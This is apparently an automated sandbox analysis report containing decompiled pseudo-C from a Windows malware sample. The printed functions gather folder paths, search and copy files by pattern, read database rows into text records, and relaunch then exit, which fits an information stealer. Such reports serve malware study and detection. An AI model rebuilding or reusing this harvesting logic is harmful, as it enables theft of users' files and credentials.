0x00408ae0
0x00408ae5
0x00408ae8
0x00408af0
0x00408af5
0x00408afc
0x00408b01
0x00408b06
0x00408b06
0x00408b09
0x00408b0f
0x00408b12
0x00408b15
0x00408b15
0x0040899b
0x00408b1e
0x00408b2c
0x00408b2d
0x00408b36
0x00408b43
0x00408b4b
0x00408b4c
0x00408b57
0x00408b67

APIs

Part of subcall function 0040EAAB: lstrlen.KERNEL32(?,?,0040C841,0040FBE1,0040FBE1,00000000,00000000,?,?,0040D115), ref: 0040EAB1
Part of subcall function 0040EAAB: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EAE3

Part of subcall function 00404A31: malloc.MSVCRT ref: 00404A39

StrCmpCA.SHLWAPI(8964C483), ref: 004089A5
StrCmpCA.SHLWAPI(8964C483), ref: 004089F9
StrCmpCA.SHLWAPI(8964C483), ref: 00408ACE

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

lstrlen.KERNEL32(0041F010), ref: 00408B26

Strings

9a, xrefs: 0040896D

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$malloc
String ID: 9a
API String ID: 2987604026-3489679592
Opcode ID: 21097cf792019f3a076e8c0f2fcc3cbbc27672bf3108ce50cc4080f47e82e535
Instruction ID: 3aeea5c8fa3d79923f023dc861636c3e79361d7a9feea0d2b92801e603e60039
Opcode Fuzzy Hash: 21097cf792019f3a076e8c0f2fcc3cbbc27672bf3108ce50cc4080f47e82e535
Instruction Fuzzy Hash: 47518F72D00108ABCB00FFBADD4669D7775BF44314F14457AFC04B7291EA38AA298BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B369 Relevance: 8.9, APIs: 7, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040B369(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				char _v548;
				char _v812;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t64;
				void* _t84;
				void* _t110;
				void* _t138;
				void* _t143;
				void* _t144;
				void* _t149;
				void* _t150;

				_t150 = __eflags;
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v1076;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v548;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v812;
				memset(_v8, 0, 0x104 << 0);
				 *0x61375c( &_v1076,  *0x613258);
				_t64 = E0040D93A( &_v20, 0x1a);
				_pop(_t110);
				 *0x61375c( &_v284,  *_t64);
				E004016EF(_v20);
				 *0x61375c( &_v284,  &_v1076);
				 *0x61375c( &_v548,  &_v284);
				 *0x61375c( &_v548,  *0x6131d8);
				 *0x61375c( &_v812,  &_v284);
				 *0x61375c( *0x613218);
				_t143 = _t138 + 0x30 - 0xc;
				E0040EA50(_t143, _t150,  &_v548); // executed
				_t84 = E0040D910( &_v812); // executed
				_t144 = _t143 + 0xc;
				if(_t84 != 0) {
					_t149 = _t144 - 0x50;
					E00401581( &_a4, _t149);
					_push( &_v812);
					E0040B1A3(_t110);
					_t144 = _t149 + 0x54;
				}
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v1076;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v548;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v812;
				memset(_v8, 0, 0x104 << 0);
				return E00401562( &_a4);
			}

0x0040b369
0x0040b37b
0x0040b388
0x0040b390
0x0040b39d
0x0040b3a5
0x0040b3b2
0x0040b3ba
0x0040b3c7
0x0040b3d6
0x0040b3e1
0x0040b3e6
0x0040b3f0
0x0040b3f9
0x0040b40c
0x0040b420
0x0040b433
0x0040b447
0x0040b45a
0x0040b460
0x0040b46c
0x0040b471
0x0040b476
0x0040b47b
0x0040b47d
0x0040b485
0x0040b490
0x0040b491
0x0040b496
0x0040b496
0x0040b49f
0x0040b4ac
0x0040b4b4
0x0040b4c1
0x0040b4c9
0x0040b4d6
0x0040b4de
0x0040b4eb
0x0040b4f9

APIs

lstrcat.KERNEL32(?), ref: 0040B3D6

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

lstrcat.KERNEL32(?,00000000), ref: 0040B3F0
lstrcat.KERNEL32(?,?), ref: 0040B40C
lstrcat.KERNEL32(?,?), ref: 0040B420
lstrcat.KERNEL32(?), ref: 0040B433
lstrcat.KERNEL32(?,?), ref: 0040B447
lstrcat.KERNEL32(?), ref: 0040B45A

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040D910: GetFileAttributesA.KERNEL32(?,?,?,004088CC,?,?,?), ref: 0040D917

Part of subcall function 0040B1A3: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0040B1B6
Part of subcall function 0040B1A3: RtlAllocateHeap.NTDLL(00000000), ref: 0040B1BD
Part of subcall function 0040B1A3: wsprintfA.USER32 ref: 0040B1D5
Part of subcall function 0040B1A3: FindFirstFileA.KERNEL32(?,?), ref: 0040B1EC
Part of subcall function 0040B1A3: StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040B209
Part of subcall function 0040B1A3: StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040B21F
Part of subcall function 0040B1A3: wsprintfA.USER32 ref: 0040B23F
Part of subcall function 0040B1A3: CopyFileA.KERNEL32(?,?,00000001), ref: 0040B258
Part of subcall function 0040B1A3: DeleteFileA.KERNEL32(?), ref: 0040B276
Part of subcall function 0040B1A3: FindNextFileA.KERNEL32(00000000,?), ref: 0040B284
Part of subcall function 0040B1A3: FindClose.KERNEL32(00000000), ref: 0040B293
Part of subcall function 0040B1A3: lstrcat.KERNEL32(?), ref: 0040B2BB
Part of subcall function 0040B1A3: lstrcat.KERNEL32(?), ref: 0040B2CE
Part of subcall function 0040B1A3: lstrlen.KERNEL32(0040B496), ref: 0040B2D7
Part of subcall function 0040B1A3: lstrlen.KERNEL32(0040B496), ref: 0040B2E4

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcesslstrcpy
String ID:
API String ID: 3089043237-0
Opcode ID: ceedef2fd50ac4c2ef0290350094dc273f2ea17efd88f1b0cc040f4d4452c927
Instruction ID: d316e5a0151ef0fb3a9c16978466d114c31561302185d14e6f931051c11c3983
Opcode Fuzzy Hash: ceedef2fd50ac4c2ef0290350094dc273f2ea17efd88f1b0cc040f4d4452c927
Instruction Fuzzy Hash: BE41E6B690021CABCF50DBA4DD89ACDB7F9FB48314F1445B6E605E3290EA34AF859F44

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC8F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040DC8F(void* __ecx, CHAR* _a4) {
				void* _v8;
				char _v12;
				void* _t5;
				void* _t7;
				intOrPtr _t9;
				void* _t15;

				_t5 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t15 = _t5;
				if(_t15 != 0xffffffff) {
					_t7 =  *0x6135e8(_t15,  &_v12);
					_push(_t15);
					if(_t7 != 0) {
						CloseHandle();
						_t9 = _v12;
					} else {
						CloseHandle();
						goto L1;
					}
				} else {
					L1:
					_t9 = 0;
				}
				return _t9;
			}

0x0040dcaa
0x0040dcb0
0x0040dcb5
0x0040dcc2
0x0040dcc8
0x0040dccb
0x0040dcd5
0x0040dcdb
0x0040dccd
0x0040dccd
0x00000000
0x0040dccd
0x0040dcb7
0x0040dcb7
0x0040dcb7
0x0040dcb9
0x0040dce3

APIs

CreateFileA.KERNEL32(0040A9EF,80000000,00000003,00000000,00000003,00000080,00000000,%s\%s,?,?,?,0040A9EF,?), ref: 0040DCAA
GetFileSizeEx.KERNEL32(00000000,0040A9EF,?,?,?,0040A9EF,?), ref: 0040DCC2
CloseHandle.KERNEL32(00000000,?,?,?,0040A9EF,?), ref: 0040DCCD
CloseHandle.KERNEL32(00000000,?,?,?,0040A9EF,?), ref: 0040DCD5

Strings

%s\%s, xrefs: 0040DC94

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID: %s\%s
API String ID: 4148174661-4073750446
Opcode ID: 3aef1dd41f19d0be9c7039d044d87c471ce4d298fef3941d9a8613887bcc1381
Instruction ID: bdec4966e1922f5f3d9751864e51da5ce42bd0c33c0cf1e8aff3537b8aea4f97
Opcode Fuzzy Hash: 3aef1dd41f19d0be9c7039d044d87c471ce4d298fef3941d9a8613887bcc1381
Instruction Fuzzy Hash: D9F08231A05224BBE72097A0DC09FDA7AADEB04770F158221FA13B23D0D7B0AB4196A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD59 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040CD59() {
				CHAR* _v8;
				char _v20;
				int _v48;
				int _v52;
				int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				int _v76;
				char _v80;
				char _v92;
				char _v104;
				char _v1104;
				intOrPtr _t59;
				intOrPtr _t60;
				void* _t80;
				void* _t100;

				_v8 =  &_v1104;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v80;
				memset(_v8, 0, 0x3c << 0);
				GetModuleFileNameA(0,  &_v1104, 0x104);
				E0040EA50( &_v20, _t100,  *0x613388);
				E0040EAEF(E0040EB6B( &_v20, 0,  &_v92, _t100,  &_v1104), 0,  &_v20);
				E004016EF(_v92);
				E0040EAEF(E0040EB6B( &_v20, 0,  &_v104, _t100,  *0x6131fc), 0,  &_v20);
				E004016EF(_v104);
				_t59 =  *0x61348c; // 0x23fc050
				_v68 = _t59;
				_t60 =  *0x6134f8; // 0x23fb460
				_v64 = _t60;
				_v80 = 0x3c;
				_v76 = 0;
				_v72 = 0;
				_v60 = _v20;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				 *0x6137b4( &_v80, _t80); // executed
				_v8 =  &_v80;
				memset(_v8, 0, 0x3c << 0);
				_v8 =  &_v1104;
				memset(_v8, 0, 0x3e8 << 0);
				E004016EF(_v20);
				ExitProcess(0);
			}

0x0040cd6b
0x0040cd78
0x0040cd7d
0x0040cd8a
0x0040cd9b
0x0040cdaa
0x0040cdc4
0x0040cdcc
0x0040cde5
0x0040cded
0x0040cdf2
0x0040cdfa
0x0040cdfd
0x0040ce02
0x0040ce09
0x0040ce10
0x0040ce13
0x0040ce16
0x0040ce19
0x0040ce1c
0x0040ce1f
0x0040ce22
0x0040ce2b
0x0040ce38
0x0040ce40
0x0040ce4d
0x0040ce51
0x0040ce57

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 0040CD9B

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

ShellExecuteEx.SHELL32(?), ref: 0040CE22
ExitProcess.KERNEL32 ref: 0040CE57

Strings

<, xrefs: 0040CE09

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 323a66401696b79b81bbf3a5115f37236314d911683994d688a3792660295eab
Instruction ID: 878ffbae2b4d15905397622c5f5c6a0d9e84631b572109e6c6e07aa8eaaba1d9
Opcode Fuzzy Hash: 323a66401696b79b81bbf3a5115f37236314d911683994d688a3792660295eab
Instruction Fuzzy Hash: 973191B1D0022DEBCB40EFA5CD819CDBBB9BB08304F54446AA615B3390DB34AE099F44

Uniqueness

Uniqueness Score: -1.00%

Function 0040480F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040480F(void* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
				intOrPtr* _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v40;
				intOrPtr _v168;
				intOrPtr* _v248;
				char _v352;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				intOrPtr* _t37;
				intOrPtr _t42;
				intOrPtr* _t43;
				void* _t44;
				void* _t49;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t60;
				void* _t61;
				signed int _t69;

				if(E00404932 != 0) {
					_t67 =  &_v352;
					_v40 = 0;
					_v20 = 0;
					_v12 = 0;
					_v16 = 0;
					_v8 = 0;
					_t36 = E004043A3(__ecx,  &_v352, __eflags, _a4);
					_t49 = _t61;
					__eflags = _t36;
					if(_t36 == 0) {
						_t36 = E0040445C(_t49,  &_v352); // executed
						__eflags = _t36;
						if(__eflags == 0) {
							_t36 = E00404501(_t49, _t67, __eflags, _a4);
							_pop(_t50);
							__eflags = _t36;
							if(_t36 == 0) {
								_t36 = E00404582(_t67);
								__eflags = _t36;
								if(_t36 == 0) {
									_push(__ebx);
									_t36 = E00404626(_t67);
									__eflags = _t36;
									if(_t36 == 0) {
										_t36 = E0040476F(_t50, _t67); // executed
										__eflags = _t36;
										if(_t36 == 0) {
											_t51 = _v248;
											__eflags = _t51;
											if(_t51 == 0) {
												L11:
												_t12 =  &_a8; // 0x404a58
												_t37 =  *_t12;
												__eflags = _t37;
												if(_t37 == 0) {
													__eflags = _v20;
													if(_v20 != 0) {
														_t69 = 0;
														__eflags = _v16;
														if(_v16 > 0) {
															do {
																FreeLibrary( *(_v20 + _t69 * 4));
																_t69 = _t69 + 1;
																_t31 =  &_v16; // 0x404a58
																__eflags = _t69 -  *_t31;
															} while (_t69 <  *_t31);
														}
														E0040D770(_v20);
													}
												} else {
													 *((intOrPtr*)(_t37 + 8)) = _v28;
													 *((intOrPtr*)(_t37 + 0xc)) = _v24;
													 *((intOrPtr*)(_t37 + 0x10)) = _v8;
													 *((intOrPtr*)(_t37 + 0x14)) = _v168;
													 *((intOrPtr*)(_t37 + 0x18)) = _v20;
													_t23 =  &_v16; // 0x404a58
													 *_t37 = 0x20;
													 *((intOrPtr*)(_t37 + 4)) = 0;
													 *((intOrPtr*)(_t37 + 0x1c)) =  *_t23;
												}
												__eflags = _v40;
												if(_v40 != 0) {
													E0040D770(_v40);
												}
												_t36 = 0;
												__eflags = 0;
											} else {
												_t42 = _v28;
												_t60 = _t51 + _t42;
												_v8 = _t60;
												_t43 =  *_t60(_t42, 1, 0);
												__eflags = _t43;
												if(_t43 != 0) {
													goto L11;
												} else {
													_t36 = 0xa;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t36;
				} else {
					_t44 = 0xfffffffe;
					return _t44;
				}
			}

0x0040481f
0x0040482d
0x00404833
0x00404836
0x00404839
0x0040483c
0x0040483f
0x00404842
0x00404847
0x00404848
0x0040484a
0x00404850
0x00404855
0x00404857
0x00404860
0x00404865
0x00404866
0x00404868
0x0040486e
0x00404873
0x00404875
0x0040487b
0x0040487e
0x00404884
0x00404886
0x0040488e
0x00404895
0x00404897
0x0040489d
0x004048a3
0x004048a5
0x004048be
0x004048be
0x004048be
0x004048c1
0x004048c3
0x004048f7
0x004048fa
0x004048fc
0x004048fe
0x00404901
0x00404903
0x00404909
0x0040490f
0x00404910
0x00404910
0x00404910
0x00404903
0x00404918
0x0040491d
0x004048c5
0x004048c8
0x004048ce
0x004048d4
0x004048dd
0x004048e3
0x004048e6
0x004048e9
0x004048ef
0x004048f2
0x004048f2
0x0040491e
0x00404921
0x00404926
0x0040492b
0x0040492c
0x0040492c
0x004048a7
0x004048a7
0x004048ad
0x004048b0
0x004048b3
0x004048b5
0x004048b7
0x00000000
0x004048b9
0x004048bb
0x004048bb
0x004048b7
0x004048a5
0x00404897
0x00404886
0x00404875
0x00404868
0x00404857
0x00404931
0x00404821
0x00404823
0x00404825
0x00404825

Strings

XJ@, xrefs: 00404910, 004048E6
XJ@, xrefs: 004048BE

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID:
String ID: XJ@$XJ@
API String ID: 0-1255385235
Opcode ID: 357272f057c73f50a1f8a1d1ecc86a6164e2675c76c47c1a80c1aa50b15aca60
Instruction ID: f07d57a1a5e87081b15afacb8a0b939b8686edab255622355bf65d607ff3e5f1
Opcode Fuzzy Hash: 357272f057c73f50a1f8a1d1ecc86a6164e2675c76c47c1a80c1aa50b15aca60
Instruction Fuzzy Hash: A0313CF5A00224AFCF25DF65D9809AEBBB6EBC4311F20447BE615B7391D7398E40CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B87E Relevance: 5.1, APIs: 4, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040B87E(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t58;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				 *0x61375c( &_v284,  *((intOrPtr*)(E0040D93A( &_v20, 0x1a))));
				E004016EF(_v20);
				 *0x61375c( &_v284, 0x40fbe4);
				 *0x61375c( &_v284,  *0x61350c);
				 *0x61375c();
				_t60 = _t58 + 0xc - 0x50;
				_t43 =  &_a4;
				E00401581( &_a4, _t58 + 0xc - 0x50);
				E0040B4FA(0x40fbe1,  &_v284,  *0x6132fc,  *0x61350c,  &_v284); // executed
				E00401581( &_a4, _t60 + 0x10);
				E0040B4FA(0x40fbe1,  &_v284,  *0x6133f8,  *0x61350c, 0x40fbe4); // executed
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E00401562(_t43);
			}

0x0040b890
0x0040b89d
0x0040b8b3
0x0040b8bc
0x0040b8ce
0x0040b8e1
0x0040b8ef
0x0040b8f5
0x0040b8f8
0x0040b8fd
0x0040b91b
0x0040b925
0x0040b93e
0x0040b94c
0x0040b959
0x0040b966

APIs

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

lstrcat.KERNEL32(?,00000000), ref: 0040B8B3
lstrcat.KERNEL32(?,0040FBE4), ref: 0040B8CE
lstrcat.KERNEL32(?), ref: 0040B8E1
lstrcat.KERNEL32(?,0040FBE4), ref: 0040B8EF

Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B515
Part of subcall function 0040B4FA: FindFirstFileA.KERNEL32(?,?), ref: 0040B52C
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040B54A
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040B564
Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B589
Part of subcall function 0040B4FA: StrCmpCA.SHLWAPI(0040FBE1,0040FBE1), ref: 0040B59A
Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B5B7
Part of subcall function 0040B4FA: PathMatchSpecA.SHLWAPI(?,?), ref: 0040B5DA
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?), ref: 0040B60A
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,0040FBE4), ref: 0040B61D
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,?), ref: 0040B62D
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,0040FBE4), ref: 0040B63B
Part of subcall function 0040B4FA: lstrcat.KERNEL32(?,?), ref: 0040B64F
Part of subcall function 0040B4FA: CopyFileA.KERNEL32(?,?,00000001), ref: 0040B665

Part of subcall function 0040B4FA: wsprintfA.USER32 ref: 0040B5C7
Part of subcall function 0040B4FA: DeleteFileA.KERNEL32(?), ref: 0040B6CD
Part of subcall function 0040B4FA: FindNextFileA.KERNEL32(?,?), ref: 0040B706
Part of subcall function 0040B4FA: FindClose.KERNEL32(?), ref: 0040B717

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: f87c71a3c89e4209863e0f043110c7d9504cd53bc2307ea926eb226fd0704690
Instruction ID: 8b22eb65218db953159443bf94cc342e9643095bc2d1887113c01647a66090e4
Opcode Fuzzy Hash: f87c71a3c89e4209863e0f043110c7d9504cd53bc2307ea926eb226fd0704690
Instruction Fuzzy Hash: 4321507280012DABCF04EBA4DC469D9777EEB44308F0484B6AA06E72A1DA35AB459F94

Uniqueness

Uniqueness Score: -1.00%

Function 00405D77 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 316
stringCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405D77(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, char _a52) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				char _v240;
				char _v252;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t131;
				signed int _t149;
				void* _t152;
				void* _t165;
				void* _t169;
				void* _t170;
				void* _t187;
				signed int _t240;
				void* _t244;
				void* _t277;
				void* _t292;
				void* _t297;
				void* _t303;
				char* _t313;
				void* _t362;
				void* _t363;

				_t292 = __ecx;
				_t313 =  &_v48;
				E0040EA50(_t313, __eflags, 0x40fbe1);
				_t369 = _a48;
				_push( *0x613248);
				_t131 = _t313;
				if(_a48 == 0) {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(_t131, _t292,  &_v96, __eflags,  *0x6132f0), _t292,  &_v16, __eflags, 0x40fbe4), _t292,  &_a28,  &_v32, __eflags), _t292,  &_v72, __eflags, "_"), _t292,  &_a16,  &_v84, __eflags), _t292,  &_v60, __eflags), _t292,  &_v48);
					E004016EF(_v60);
					E004016EF(_v84);
					E004016EF(_v72);
					E004016EF(_v32);
					E004016EF(_v16);
					_t149 = _v96;
				} else {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(_t131, _t292,  &_v32, _t369,  *0x6132f0), _t292,  &_v72, _t369, 0x40fbe4), _t292,  &_a28,  &_v84, _t369), _t292,  &_v60, _t369), _t292,  &_v48);
					E004016EF(_v60);
					E004016EF(_v84);
					E004016EF(_v72);
					_t149 = _v32;
				}
				E004016EF(_t149);
				_t152 =  *0x6135c0(_a4,  &_v36); // executed
				if(_t152 == 0) {
					_t165 =  *0x61357c(_v36,  *0x61314c, 0xffffffff,  &_v20, _t152); // executed
					_t363 = _t362 + 0x14;
					_t371 = _t165;
					if(_t165 == 0) {
						E0040EA50( &_v16, _t371, 0x40fbe1);
						_t169 =  *0x613598(_v20);
						_pop(_t297);
						_t372 = _t169 - 0x64;
						if(_t169 == 0x64) {
							_t291 = "\n";
							do {
								E0040EA50( &_v60, _t372,  *0x6135b4(_v20, 0));
								E0040EA50( &_v84, _t372,  *0x6135b4(_v20, 1));
								_t187 =  *0x6135b4(_v20, 2);
								_pop(_t303);
								E0040EA50( &_v72, _t372, _t187);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v96, _t372,  *0x6131c0), _t303,  &_v16);
								E004016EF(_v96);
								E0040EAEF(E0040EB29( &_v16, _t303,  &_v60,  &_v204, _t372), _t303,  &_v16);
								E004016EF(_v204);
								_t49 =  &_v264; // 0x412120
								E0040EAEF(E0040EB6B( &_v16, _t303, _t49, _t372, "\n"), _t303,  &_v16);
								_t52 =  &_v264; // 0x412120
								E004016EF( *_t52);
								E0040EAEF(E0040EB6B( &_v16, _t303,  &_v120, _t372,  *0x61321c), _t303,  &_v16);
								E004016EF(_v120);
								E0040EAEF(E0040EB29( &_v16, _t303,  &_v84,  &_v156, _t372), _t303,  &_v16);
